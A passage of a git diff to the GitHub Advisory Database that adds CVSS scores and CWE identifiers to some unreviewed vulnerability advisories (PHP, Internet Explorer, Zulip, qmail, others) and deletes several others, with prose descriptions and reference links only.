"GHSA-m9m5-q9x5-6877", - "modified": "2022-05-01T23:31:45Z", + "modified": "2024-02-02T15:30:27Z", "published": "2022-05-01T23:31:45Z", "aliases": [ "CVE-2008-0599" ], "details": "The init_request_info function in sapi/cgi/cgi_main.c in PHP before 5.2.6 does not properly consider operator precedence when calculating the length of PATH_TRANSLATED, which might allow remote attackers to execute arbitrary code via a crafted URI.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -165,7 +168,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-131" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-mf54-6363-29h5/GHSA-mf54-6363-29h5.json b/advisories/unreviewed/2022/05/GHSA-mf54-6363-29h5/GHSA-mf54-6363-29h5.json index 4c06abebab56d..991ba0758a6d6 100644 --- a/advisories/unreviewed/2022/05/GHSA-mf54-6363-29h5/GHSA-mf54-6363-29h5.json +++ b/advisories/unreviewed/2022/05/GHSA-mf54-6363-29h5/GHSA-mf54-6363-29h5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mf54-6363-29h5", - "modified": "2022-05-01T23:27:33Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-05-01T23:27:33Z", "aliases": [ "CVE-2008-0077" ], "details": "Use-after-free vulnerability in Microsoft Internet Explorer 6 SP1, 6 SP2, and and 7 allows remote attackers to execute arbitrary code by assigning malformed values to certain properties, as demonstrated using the by property of an animateMotion SVG element, aka \"Property Memory Corruption Vulnerability.\"", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -69,7 +72,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-mg66-3x8x-r8g2/GHSA-mg66-3x8x-r8g2.json b/advisories/unreviewed/2022/05/GHSA-mg66-3x8x-r8g2/GHSA-mg66-3x8x-r8g2.json deleted file mode 100644 index 33e86585cdc54..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-mg66-3x8x-r8g2/GHSA-mg66-3x8x-r8g2.json +++ /dev/null @@ -1,55 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-mg66-3x8x-r8g2", - "modified": "2022-05-02T03:46:56Z", - "published": "2022-05-02T03:46:56Z", - "aliases": [ - "CVE-2009-3630" - ], - "details": "The Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allows remote authenticated users to place arbitrary web sites in TYPO3 backend framesets via crafted parameters, related to a \"frame hijacking\" issue.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3630" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53920" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37122" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/36801" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2009/3009" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-11-02T15:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-mg67-hj6h-72h8/GHSA-mg67-hj6h-72h8.json b/advisories/unreviewed/2022/05/GHSA-mg67-hj6h-72h8/GHSA-mg67-hj6h-72h8.json index 35b1d5ad9b6af..d408f412a9c58 100644 --- a/advisories/unreviewed/2022/05/GHSA-mg67-hj6h-72h8/GHSA-mg67-hj6h-72h8.json +++ b/advisories/unreviewed/2022/05/GHSA-mg67-hj6h-72h8/GHSA-mg67-hj6h-72h8.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mg67-hj6h-72h8", - "modified": "2022-05-02T03:40:54Z", + "modified": "2024-02-08T21:30:31Z", "published": "2022-05-02T03:40:54Z", "aliases": [ "CVE-2009-3022" ], "details": "Cross-site request forgery (CSRF) vulnerability in bingo!CMS 1.2 and earlier allows remote attackers to hijack the authentication of other users for requests that modify configuration or change content via unspecified vectors.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-mg72-h5gj-8gg7/GHSA-mg72-h5gj-8gg7.json b/advisories/unreviewed/2022/05/GHSA-mg72-h5gj-8gg7/GHSA-mg72-h5gj-8gg7.json deleted file mode 100644 index 025b8a3150f96..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-mg72-h5gj-8gg7/GHSA-mg72-h5gj-8gg7.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-mg72-h5gj-8gg7", - "modified": "2023-10-25T18:31:24Z", - "published": "2022-05-24T16:52:45Z", - "aliases": [ - "CVE-2019-10377" - ], - "details": "A missing permission check in Jenkins Avatar Plugin 1.2 and earlier allows attackers with Overall/Read access to change the avatar of any user of Jenkins.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10377" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1099" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-08-07T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-mhwq-4mh7-fv7c/GHSA-mhwq-4mh7-fv7c.json b/advisories/unreviewed/2022/05/GHSA-mhwq-4mh7-fv7c/GHSA-mhwq-4mh7-fv7c.json deleted file mode 100644 index f1fb107a676bf..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-mhwq-4mh7-fv7c/GHSA-mhwq-4mh7-fv7c.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-mhwq-4mh7-fv7c", - "modified": "2022-05-13T01:40:55Z", - "published": "2022-05-13T01:40:55Z", - "aliases": [ - "CVE-2017-1000096" - ], - "details": "Arbitrary code execution due to incomplete sandbox protection: Constructors, instance variable initializers, and instance initializers in Pipeline scripts were not subject to sandbox protection, and could therefore execute arbitrary code. This could be exploited e.g. by regular Jenkins users with the permission to configure Pipelines in Jenkins, or by trusted committers to repositories containing Jenkinsfiles.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000096" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2017-07-10/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/99571" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-732" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-10-05T01:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-mmjh-45vj-hfvf/GHSA-mmjh-45vj-hfvf.json b/advisories/unreviewed/2022/05/GHSA-mmjh-45vj-hfvf/GHSA-mmjh-45vj-hfvf.json deleted file mode 100644 index a95fa47a1e3a4..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-mmjh-45vj-hfvf/GHSA-mmjh-45vj-hfvf.json +++ /dev/null @@ -1,79 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-mmjh-45vj-hfvf", - "modified": "2022-05-17T05:50:10Z", - "published": "2022-05-17T05:50:10Z", - "aliases": [ - "CVE-2010-2274" - ], - "details": "Multiple open redirect vulnerabilities in Dojo 1.0.x before 1.0.3, 1.1.x before 1.1.2, 1.2.x before 1.2.4, 1.3.x before 1.3.3, and 1.4.x before 1.4.2 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors, possibly related to dojo/resources/iframe_history.html, dojox/av/FLAudio.js, dojox/av/FLVideo.js, dojox/av/resources/audio.swf, dojox/av/resources/video.swf, util/buildscripts/jslib/build.js, util/buildscripts/jslib/buildUtil.js, and util/doh/runner.html.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2274" - }, - { - "type": "WEB", - "url": "http://dojotoolkit.org/blog/post/dylan/2010/03/dojo-security-advisory/" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/38964" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/40007" - }, - { - "type": "WEB", - "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21431472" - }, - { - "type": "WEB", - "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50833" - }, - { - "type": "WEB", - "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50849" - }, - { - "type": "WEB", - "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50856" - }, - { - "type": "WEB", - "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50896" - }, - { - "type": "WEB", - "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50932" - }, - { - "type": "WEB", - "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50958" - }, - { - "type": "WEB", - "url": "http://www-1.ibm.com/support/docview.wss?uid=swg1LO50994" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/1281" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-06-15T14:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-mmrv-3cqg-hpf9/GHSA-mmrv-3cqg-hpf9.json b/advisories/unreviewed/2022/05/GHSA-mmrv-3cqg-hpf9/GHSA-mmrv-3cqg-hpf9.json deleted file mode 100644 index 8ca9104e2e754..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-mmrv-3cqg-hpf9/GHSA-mmrv-3cqg-hpf9.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-mmrv-3cqg-hpf9", - "modified": "2022-05-13T01:31:35Z", - "published": "2022-05-13T01:31:35Z", - "aliases": [ - "CVE-2019-1003007" - ], - "details": "A cross-site request forgery vulnerability exists in Jenkins Warnings Plugin 5.0.0 and earlier in src/main/java/hudson/plugins/warnings/GroovyParser.java that allows attackers to execute arbitrary code via a form validation HTTP endpoint.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003007" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1295%20%281%29" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-01-28/#SECURITY-1295%20(1)" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-02-06T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-mmx6-xv2h-w7x8/GHSA-mmx6-xv2h-w7x8.json b/advisories/unreviewed/2022/05/GHSA-mmx6-xv2h-w7x8/GHSA-mmx6-xv2h-w7x8.json index a56ac65a48602..7548213bc6699 100644 --- a/advisories/unreviewed/2022/05/GHSA-mmx6-xv2h-w7x8/GHSA-mmx6-xv2h-w7x8.json +++ b/advisories/unreviewed/2022/05/GHSA-mmx6-xv2h-w7x8/GHSA-mmx6-xv2h-w7x8.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mmx6-xv2h-w7x8", - "modified": "2022-05-24T16:56:27Z", + "modified": "2024-02-08T21:30:32Z", "published": "2022-05-24T16:56:27Z", "aliases": [ "CVE-2019-16215" ], "details": "The Markdown parser in Zulip server before 2.0.5 used a regular expression vulnerable to exponential backtracking. A user who is logged into the server could send a crafted message causing the server to spend an effectively arbitrary amount of CPU time and stall the processing of future messages.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-1333" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-mpw2-6pxv-5r2w/GHSA-mpw2-6pxv-5r2w.json b/advisories/unreviewed/2022/05/GHSA-mpw2-6pxv-5r2w/GHSA-mpw2-6pxv-5r2w.json index 976f79178eae6..5a539e876ffba 100644 --- a/advisories/unreviewed/2022/05/GHSA-mpw2-6pxv-5r2w/GHSA-mpw2-6pxv-5r2w.json +++ b/advisories/unreviewed/2022/05/GHSA-mpw2-6pxv-5r2w/GHSA-mpw2-6pxv-5r2w.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mpw2-6pxv-5r2w", - "modified": "2022-05-24T17:37:34Z", + "modified": "2024-02-02T15:30:27Z", "published": "2022-05-24T17:37:34Z", "aliases": [ "CVE-2019-25011" ], "details": "NetBox through 2.6.2 allows an Authenticated User to conduct an XSS attack against an admin via a GFM-rendered field, as demonstrated by /dcim/sites/add/ comments.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-mqj3-fc39-73fj/GHSA-mqj3-fc39-73fj.json b/advisories/unreviewed/2022/05/GHSA-mqj3-fc39-73fj/GHSA-mqj3-fc39-73fj.json deleted file mode 100644 index 71971192f9281..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-mqj3-fc39-73fj/GHSA-mqj3-fc39-73fj.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-mqj3-fc39-73fj", - "modified": "2023-10-25T18:31:21Z", - "published": "2022-05-24T22:00:03Z", - "aliases": [ - "CVE-2019-10324" - ], - "details": "A cross-site request forgery vulnerability in Jenkins Artifactory Plugin 3.2.2 and earlier in ReleaseAction#doSubmit, GradleReleaseApiAction#doStaging, MavenReleaseApiAction#doStaging, and UnifiedPromoteBuildAction#doSubmit allowed attackers to schedule a release build, perform release staging for Gradle and Maven projects, and promote previously staged builds, respectively.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10324" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-05-31/#SECURITY-1347" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/05/31/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/108540" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-05-31T15:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-mqmr-46gm-2w7q/GHSA-mqmr-46gm-2w7q.json b/advisories/unreviewed/2022/05/GHSA-mqmr-46gm-2w7q/GHSA-mqmr-46gm-2w7q.json index 5ec615007c978..b2b48f9658f03 100644 --- a/advisories/unreviewed/2022/05/GHSA-mqmr-46gm-2w7q/GHSA-mqmr-46gm-2w7q.json +++ b/advisories/unreviewed/2022/05/GHSA-mqmr-46gm-2w7q/GHSA-mqmr-46gm-2w7q.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mqmr-46gm-2w7q", - "modified": "2022-05-02T06:11:16Z", + "modified": "2024-02-02T03:30:31Z", "published": "2022-05-02T06:11:16Z", "aliases": [ "CVE-2010-0258" ], "details": "Microsoft Office Excel 2002 SP3, 2003 SP3, and 2007 SP1 and SP2; Office 2004 and 2008 for Mac; Open XML File Format Converter for Mac; Office Excel Viewer SP1 and SP2; and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2 do not properly parse the Excel file format, which allows remote attackers to execute arbitrary code via a crafted spreadsheet that causes memory to be interpreted as a different object type than intended, aka \"Microsoft Office Excel Sheet Object Type Confusion Vulnerability.\"", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -41,6 +44,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-843", "CWE-94" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2022/05/GHSA-mrjp-428h-53c5/GHSA-mrjp-428h-53c5.json b/advisories/unreviewed/2022/05/GHSA-mrjp-428h-53c5/GHSA-mrjp-428h-53c5.json index 53a62189e04d6..942d54e31c544 100644 --- a/advisories/unreviewed/2022/05/GHSA-mrjp-428h-53c5/GHSA-mrjp-428h-53c5.json +++ b/advisories/unreviewed/2022/05/GHSA-mrjp-428h-53c5/GHSA-mrjp-428h-53c5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mrjp-428h-53c5", - "modified": "2022-05-02T06:22:51Z", + "modified": "2024-02-02T18:30:22Z", "published": "2022-05-02T06:22:51Z", "aliases": [ "CVE-2010-1437" ], "details": "Race condition in the find_keyring_by_name function in security/keys/keyring.c in the Linux kernel 2.6.34-rc5 and earlier allows local users to cause a denial of service (memory corruption and system crash) or possibly have unspecified other impact via keyctl session commands that trigger access to a dead keyring that is undergoing deletion by the key_cleanup function.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/05/GHSA-mrmc-m8fj-g9px/GHSA-mrmc-m8fj-g9px.json b/advisories/unreviewed/2022/05/GHSA-mrmc-m8fj-g9px/GHSA-mrmc-m8fj-g9px.json index b73cfcc36322f..43010779e3b48 100644 --- a/advisories/unreviewed/2022/05/GHSA-mrmc-m8fj-g9px/GHSA-mrmc-m8fj-g9px.json +++ b/advisories/unreviewed/2022/05/GHSA-mrmc-m8fj-g9px/GHSA-mrmc-m8fj-g9px.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mrmc-m8fj-g9px", - "modified": "2022-05-01T01:59:28Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-05-01T01:59:28Z", "aliases": [ "CVE-2005-1513" ], "details": "Integer overflow in the stralloc_readyplus function in qmail, when running on 64 bit platforms with a large amount of virtual memory, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large SMTP request.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -93,7 +96,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-mvpr-q6rh-8vrp/GHSA-mvpr-q6rh-8vrp.json b/advisories/unreviewed/2022/05/GHSA-mvpr-q6rh-8vrp/GHSA-mvpr-q6rh-8vrp.json deleted file mode 100644 index f4c43c217466d..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-mvpr-q6rh-8vrp/GHSA-mvpr-q6rh-8vrp.json +++ /dev/null @@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-mvpr-q6rh-8vrp", - "modified": "2022-06-04T00:00:32Z", - "published": "2022-05-24T17:32:32Z", - "aliases": [ - "CVE-2020-24303" - ], - "details": "Grafana before 7.1.0-beta 1 allows XSS via a query alias for the ElasticSearch datasource.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24303" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/pull/25401" - }, - { - "type": "WEB", - "url": "https://github.com/grafana/grafana/blob/master/CHANGELOG.md#710-beta-1-2020-07-01" - }, - { - "type": "WEB", - "url": "https://security.netapp.com/advisory/ntap-20201123-0002/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-10-28T14:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-mwqv-jff6-5v62/GHSA-mwqv-jff6-5v62.json b/advisories/unreviewed/2022/05/GHSA-mwqv-jff6-5v62/GHSA-mwqv-jff6-5v62.json deleted file mode 100644 index 606ac11204f5b..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-mwqv-jff6-5v62/GHSA-mwqv-jff6-5v62.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-mwqv-jff6-5v62", - "modified": "2022-05-17T05:47:13Z", - "published": "2022-05-17T05:47:13Z", - "aliases": [ - "CVE-2010-3715" - ], - "details": "Multiple cross-site scripting (XSS) vulnerabilities in TYPO3 4.2.x before 4.2.15, 4.3.x before 4.3.7, and 4.4.x before 4.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the RemoveXSS function, and allow remote authenticated users to inject arbitrary web script or HTML via vectors related to (2) the backend.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3715" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020/" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2010/dsa-2121" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/43786" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-10-25T20:01:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-p3g4-9xfv-wq9v/GHSA-p3g4-9xfv-wq9v.json b/advisories/unreviewed/2022/05/GHSA-p3g4-9xfv-wq9v/GHSA-p3g4-9xfv-wq9v.json deleted file mode 100644 index 3d71d51580781..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-p3g4-9xfv-wq9v/GHSA-p3g4-9xfv-wq9v.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-p3g4-9xfv-wq9v", - "modified": "2022-05-14T03:40:05Z", - "published": "2022-05-14T03:40:05Z", - "aliases": [ - "CVE-2018-1000058" - ], - "details": "Jenkins Pipeline: Supporting APIs Plugin 2.17 and earlier have an arbitrary code execution due to incomplete sandbox protection: Methods related to Java deserialization like readResolve implemented in Pipeline scripts were not subject to sandbox protection, and could therefore execute arbitrary code. This could be exploited e.g. by regular Jenkins users with the permission to configure Pipelines in Jenkins, or by trusted committers to repositories containing Jenkinsfiles.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000058" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-02-05/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/103034" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-502" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-02-09T23:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-p498-rpcw-3578/GHSA-p498-rpcw-3578.json b/advisories/unreviewed/2022/05/GHSA-p498-rpcw-3578/GHSA-p498-rpcw-3578.json deleted file mode 100644 index 57cae598f548e..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-p498-rpcw-3578/GHSA-p498-rpcw-3578.json +++ /dev/null @@ -1,38 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-p498-rpcw-3578", - "modified": "2022-05-14T03:45:49Z", - "published": "2022-05-14T03:45:49Z", - "aliases": [ - "CVE-2018-1000012" - ], - "details": "Jenkins Warnings Plugin 4.64 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000012" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2018-01-22/" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-611" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2018-01-23T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-p6m5-h7pp-v2x5/GHSA-p6m5-h7pp-v2x5.json b/advisories/unreviewed/2022/05/GHSA-p6m5-h7pp-v2x5/GHSA-p6m5-h7pp-v2x5.json deleted file mode 100644 index d5320461daacc..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-p6m5-h7pp-v2x5/GHSA-p6m5-h7pp-v2x5.json +++ /dev/null @@ -1,71 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-p6m5-h7pp-v2x5", - "modified": "2022-05-02T03:47:43Z", - "published": "2022-05-02T03:47:43Z", - "aliases": [ - "CVE-2009-3695" - ], - "details": "Algorithmic complexity vulnerability in the forms library in Django 1.0 before 1.0.4 and 1.1 before 1.1.1 allows remote attackers to cause a denial of service (CPU consumption) via a crafted (1) EmailField (email address) or (2) URLField (URL) that triggers a large amount of backtracking in a regular expression.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3695" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53727" - }, - { - "type": "WEB", - "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=550457" - }, - { - "type": "WEB", - "url": "http://groups.google.com/group/django-users/browse_thread/thread/15df9e45118dfc51/" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/36948" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/36968" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2009/dsa-1905" - }, - { - "type": "WEB", - "url": "http://www.djangoproject.com/weblog/2009/oct/09/security/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2009/10/13/6" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/36655" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2009/2871" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-10-13T10:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-p75g-gcv5-42qg/GHSA-p75g-gcv5-42qg.json b/advisories/unreviewed/2022/05/GHSA-p75g-gcv5-42qg/GHSA-p75g-gcv5-42qg.json deleted file mode 100644 index 2b1a0e7c91b18..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-p75g-gcv5-42qg/GHSA-p75g-gcv5-42qg.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-p75g-gcv5-42qg", - "modified": "2022-05-24T17:24:33Z", - "published": "2022-05-24T17:24:33Z", - "aliases": [ - "CVE-2020-15899" - ], - "details": "Grin 3.0.0 before 4.0.0 has insufficient validation of data related to Mimblewimble.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15899" - }, - { - "type": "WEB", - "url": "https://github.com/mimblewimble/grin-security/blob/master/CVEs/CVE-2020-15899.md" - }, - { - "type": "WEB", - "url": "https://github.com/mimblewimble/grin/compare/v3.1.1...v4.0.0" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-07-28T18:15:00Z" - } -} \ No 